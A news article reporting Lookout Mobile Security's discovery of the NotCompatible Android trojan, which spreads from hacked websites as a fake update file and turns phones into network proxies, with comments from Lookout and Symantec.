Android malware infecting through 'legitimate websites'

Mobile trojans turn phones into proxies

Lookout Mobile Security identified an industry first this Wednesday, discovering a malicious software package specifically designed to download to Android phones from hacked websites.

The trojan, called NotCompatible, comes in the guise of an automatically downloaded update file (Update.apk), which requires user confirmation to install.

Once allowed to run on the device, the trojan acts as a TCP relay that can use its host as a mask to send traffic like a proxy.

The URLs of infected sites have yet to be released, and the number of affected domains seems to be up in the air.

Lookout argues that these sites number in the tens; Symantec claims thousands could be compromised.

Also unknown is the purpose for this apparently "well-written and stable" infectious code, though Lookout speculates that the attacks are aimed at enabling anonymous hosting for criminal activity.

"There are a couple of ways [the hackers] can profit from this," said Kevin Mahaffrey, co-founder and CTO of Lookout Security. "One is general online fraud. The other is targeted attacks against enterprises."

Lookout said they haven't seen any attacks aimed at specific companies, but are tracking purchasing activity related to this trojan.

Ice Cream Frontier

Hacking is old news, but NotCompatible represents the inception of what could be a new wave of malicious software distribution via websites.

According to Mahaffrey, "This is the first time that [hackers] have used legitimate websites to serve Android malware," though it's far from being the first downloadable, Android-specific trojan.

"We see Android malware all the time," added Mahaffrey, "but it's usually served using social engineering."

And it's no surprise that hackers are turning their attention towards these devices. With the recently-unveiled Samsung Galaxy S3 hitting markets later this month, the Android platform is poised to take 50 percent of the mobile market share.

Lookout is still investigating NotCompatible, but is using this attack to begin adapting to the changing landscape of mobile device vulnerabilities.

For now, Android phone manufacturers may only find solace in the timeless words of Notorious B.I.G., "Mo' money, mo problems."